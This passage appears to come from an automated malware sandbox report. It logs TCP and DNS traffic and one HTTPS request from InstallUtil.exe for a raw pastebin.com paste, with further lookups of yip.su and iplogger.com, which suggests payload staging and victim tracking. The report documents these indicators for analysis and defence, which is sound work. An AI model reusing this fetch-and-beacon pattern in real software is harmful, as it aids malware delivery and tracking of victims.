                          Sep 12, 2024 22:01:37.801105976 CEST44349723188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:37.801146984 CEST49723443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:37.801654100 CEST49723443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:42.338745117 CEST49724443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:42.338809013 CEST44349724172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:42.338898897 CEST49724443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:42.339250088 CEST49724443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:42.339265108 CEST44349724172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:42.840954065 CEST44349724172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:42.843786001 CEST49724443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:42.843816996 CEST44349724172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:42.995184898 CEST44349724172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:42.995233059 CEST44349724172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:42.995290995 CEST44349724172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:42.995316029 CEST44349724172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:42.995470047 CEST49724443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:42.995492935 CEST44349724172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:42.997756958 CEST44349724172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:42.997879028 CEST49724443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:42.998565912 CEST49724443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:43.035265923 CEST49725443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:43.035319090 CEST44349725188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:43.035393000 CEST49725443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:43.035660028 CEST49725443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:43.035672903 CEST44349725188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:43.492026091 CEST44349725188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:43.497040033 CEST49725443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:43.497066021 CEST44349725188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:43.719669104 CEST44349725188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:43.719727039 CEST44349725188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:43.719759941 CEST44349725188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:43.719790936 CEST44349725188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:43.719819069 CEST44349725188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:43.719821930 CEST49725443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:43.719850063 CEST44349725188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:43.719862938 CEST49725443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:43.719881058 CEST44349725188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:43.719888926 CEST49725443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:43.719893932 CEST44349725188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:43.719935894 CEST49725443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:43.719939947 CEST44349725188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:43.719960928 CEST44349725188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:43.719996929 CEST49725443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:43.720439911 CEST49725443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:48.151021957 CEST49726443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:48.151074886 CEST44349726172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:48.151166916 CEST49726443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:48.151456118 CEST49726443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:48.151472092 CEST44349726172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:48.611222982 CEST44349726172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:48.612965107 CEST49726443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:48.612987041 CEST44349726172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:48.736488104 CEST44349726172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:48.736537933 CEST44349726172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:48.736568928 CEST44349726172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:48.736598969 CEST44349726172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:48.736689091 CEST44349726172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:48.736721039 CEST49726443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:48.736846924 CEST49726443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:48.738281012 CEST49726443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:48.766751051 CEST49727443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:48.766855955 CEST44349727188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:48.766963959 CEST49727443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:48.767250061 CEST49727443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:48.767277956 CEST44349727188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:49.231878042 CEST44349727188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:49.233684063 CEST49727443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:49.233721018 CEST44349727188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:49.452852964 CEST44349727188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:49.452922106 CEST44349727188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:49.452959061 CEST44349727188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:49.453005075 CEST44349727188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:49.453025103 CEST49727443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:49.453052998 CEST44349727188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:49.453073025 CEST49727443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:49.453154087 CEST44349727188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:49.453187943 CEST44349727188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:49.453192949 CEST49727443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:49.453205109 CEST44349727188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:49.453242064 CEST49727443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:49.453253984 CEST44349727188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:49.453330040 CEST44349727188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:49.453370094 CEST49727443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:49.453742981 CEST49727443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:53.885648012 CEST49728443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:53.885751963 CEST44349728172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:53.885874033 CEST49728443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:53.886140108 CEST49728443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:53.886174917 CEST44349728172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:54.352446079 CEST44349728172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:54.354832888 CEST49728443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:54.354867935 CEST44349728172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:54.502367020 CEST44349728172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:54.502497911 CEST44349728172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:54.502582073 CEST44349728172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:54.502582073 CEST49728443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:54.502619982 CEST44349728172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:54.502661943 CEST49728443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:54.502681971 CEST44349728172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:54.502893925 CEST44349728172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:54.502954006 CEST49728443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:54.503326893 CEST49728443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:54.525254965 CEST49729443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:54.525319099 CEST44349729188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:54.525542974 CEST49729443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:54.525875092 CEST49729443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:54.525892973 CEST44349729188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:54.984982014 CEST44349729188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:54.987027884 CEST49729443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:54.987059116 CEST44349729188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:55.199269056 CEST44349729188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:55.199421883 CEST44349729188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:55.199505091 CEST49729443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:55.199510098 CEST44349729188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:55.199537992 CEST44349729188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:55.199585915 CEST49729443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:55.199620962 CEST44349729188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:55.199764967 CEST44349729188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:55.199809074 CEST49729443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:55.199820995 CEST44349729188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:55.200002909 CEST44349729188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:55.200073004 CEST49729443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:55.200489044 CEST49729443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:59.635332108 CEST49730443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:59.635370016 CEST44349730172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:59.635452032 CEST49730443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:59.635740042 CEST49730443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:59.635754108 CEST44349730172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:00.092474937 CEST44349730172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:00.094142914 CEST49730443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:00.094161034 CEST44349730172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:00.231961966 CEST44349730172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:00.232037067 CEST44349730172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:00.232076883 CEST44349730172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:00.232117891 CEST44349730172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:00.232146978 CEST49730443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:00.232172966 CEST44349730172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:00.232192039 CEST49730443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:00.232193947 CEST44349730172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:00.232240915 CEST49730443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:00.232973099 CEST49730443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:00.279033899 CEST49731443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:00.279079914 CEST44349731188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:00.279150009 CEST49731443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:00.279402018 CEST49731443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:00.279412985 CEST44349731188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:00.740575075 CEST44349731188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:00.790232897 CEST49731443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:00.790273905 CEST44349731188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:00.994924068 CEST44349731188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:00.994987011 CEST44349731188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:00.995031118 CEST44349731188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:00.995032072 CEST49731443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:00.995059013 CEST44349731188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:00.995095968 CEST49731443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:00.995102882 CEST44349731188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:00.995147943 CEST44349731188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:00.995182037 CEST49731443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:00.995183945 CEST44349731188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:00.995198011 CEST44349731188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:00.995229006 CEST49731443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:00.995237112 CEST44349731188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:00.995302916 CEST44349731188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:00.995337009 CEST49731443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:01.023443937 CEST49731443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:05.420466900 CEST49732443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:05.420531034 CEST44349732172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:05.420609951 CEST49732443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:05.420890093 CEST49732443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:05.420905113 CEST44349732172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:06.076805115 CEST44349732172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:06.078404903 CEST49732443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:06.078444004 CEST44349732172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:06.203751087 CEST44349732172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:06.203883886 CEST44349732172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:06.203969955 CEST44349732172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:06.203970909 CEST49732443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:06.203999043 CEST44349732172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:06.204036951 CEST49732443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:06.204052925 CEST44349732172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:06.204232931 CEST44349732172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:06.204277039 CEST49732443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:06.210766077 CEST49732443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:06.553695917 CEST49733443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:06.553740025 CEST44349733188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:06.553792953 CEST49733443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:06.554037094 CEST49733443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:06.554049015 CEST44349733188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:07.047454119 CEST44349733188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:07.049400091 CEST49733443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:07.049412966 CEST44349733188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:07.271101952 CEST44349733188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:07.271161079 CEST44349733188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:07.271197081 CEST44349733188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:07.271197081 CEST49733443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:07.271208048 CEST44349733188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:07.271246910 CEST49733443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:07.271259069 CEST44349733188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:07.271311045 CEST44349733188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:07.271342039 CEST44349733188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:07.271349907 CEST49733443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:07.271354914 CEST44349733188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:07.271393061 CEST49733443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:07.271397114 CEST44349733188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:07.271436930 CEST44349733188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:07.271471977 CEST49733443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:07.271959066 CEST49733443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:11.666716099 CEST49734443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:11.666765928 CEST44349734172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:11.667011023 CEST49734443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:11.667362928 CEST49734443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:11.667381048 CEST44349734172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:12.366482019 CEST44349734172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:12.410278082 CEST49734443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:12.637188911 CEST49734443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:12.637217999 CEST44349734172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:12.741429090 CEST44349734172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:12.741565943 CEST44349734172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:12.741614103 CEST49734443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:12.741641998 CEST44349734172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:12.741724014 CEST44349734172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:12.741800070 CEST49734443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:12.741815090 CEST44349734172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:12.741960049 CEST44349734172.67.19.24192.168.2.8
                          Sep 12, 2024 22:02:12.742019892 CEST49734443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:12.742347956 CEST49734443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:02:12.758198977 CEST49735443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:12.758306980 CEST44349735188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:12.758457899 CEST49735443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:12.758678913 CEST49735443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:12.758711100 CEST44349735188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:13.217526913 CEST44349735188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:13.219376087 CEST49735443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:13.219480038 CEST44349735188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:13.473932028 CEST44349735188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:13.473982096 CEST44349735188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:13.474013090 CEST44349735188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:13.474047899 CEST44349735188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:13.474080086 CEST44349735188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:13.474114895 CEST44349735188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:13.474149942 CEST49735443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:13.474205971 CEST44349735188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:13.474226952 CEST49735443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:13.474229097 CEST44349735188.114.96.3192.168.2.8
                          Sep 12, 2024 22:02:13.474272966 CEST49735443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:02:13.474632025 CEST49735443192.168.2.8188.114.96.3

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Sep 12, 2024 22:01:17.539947987 CEST5847553192.168.2.81.1.1.1
                          Sep 12, 2024 22:01:17.546920061 CEST53584751.1.1.1192.168.2.8
                          Sep 12, 2024 22:01:18.365176916 CEST5432253192.168.2.81.1.1.1
                          Sep 12, 2024 22:01:18.384150982 CEST53543221.1.1.1192.168.2.8
                          Sep 12, 2024 22:01:29.620120049 CEST6063053192.168.2.81.1.1.1
                          Sep 12, 2024 22:01:29.627996922 CEST53606301.1.1.1192.168.2.8
                          Sep 12, 2024 22:01:35.322761059 CEST5865453192.168.2.81.1.1.1
                          Sep 12, 2024 22:01:35.335414886 CEST53586541.1.1.1192.168.2.8

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Sep 12, 2024 22:01:17.539947987 CEST192.168.2.81.1.1.10x9642Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                          Sep 12, 2024 22:01:18.365176916 CEST192.168.2.81.1.1.10xbcd1Standard query (0)yip.suA (IP address)IN (0x0001)false
                          Sep 12, 2024 22:01:29.620120049 CEST192.168.2.81.1.1.10xd42fStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                          Sep 12, 2024 22:01:35.322761059 CEST192.168.2.81.1.1.10xbf7fStandard query (0)iplogger.comA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Sep 12, 2024 22:01:17.546920061 CEST1.1.1.1192.168.2.80x9642No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                          Sep 12, 2024 22:01:17.546920061 CEST1.1.1.1192.168.2.80x9642No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                          Sep 12, 2024 22:01:17.546920061 CEST1.1.1.1192.168.2.80x9642No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                          Sep 12, 2024 22:01:18.384150982 CEST1.1.1.1192.168.2.80xbcd1No error (0)yip.su188.114.96.3A (IP address)IN (0x0001)false
                          Sep 12, 2024 22:01:18.384150982 CEST1.1.1.1192.168.2.80xbcd1No error (0)yip.su188.114.97.3A (IP address)IN (0x0001)false
                          Sep 12, 2024 22:01:29.627996922 CEST1.1.1.1192.168.2.80xd42fNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                          Sep 12, 2024 22:01:29.627996922 CEST1.1.1.1192.168.2.80xd42fNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                          Sep 12, 2024 22:01:29.627996922 CEST1.1.1.1192.168.2.80xd42fNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                          Sep 12, 2024 22:01:35.335414886 CEST1.1.1.1192.168.2.80xbf7fNo error (0)iplogger.com104.21.76.57A (IP address)IN (0x0001)false
                          Sep 12, 2024 22:01:35.335414886 CEST1.1.1.1192.168.2.80xbf7fNo error (0)iplogger.com172.67.188.178A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • pastebin.com
                          • yip.su
                          • iplogger.com

                          HTTPS Proxied Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.849715104.20.4.2354436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:01:18 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                          Host: pastebin.com
                          Connection: Keep-Alive
                          2024-09-12 20:01:18 UTC222INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:01:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          X-Frame-Options: SAMEORIGIN
                          Server: cloudflare
                          CF-RAY: 8c227d187e14c411-EWR
                          2024-09-12 20:01:18 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                          Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                          2024-09-12 20:01:18 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                          Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                          2024-09-12 20:01:18 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                          Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
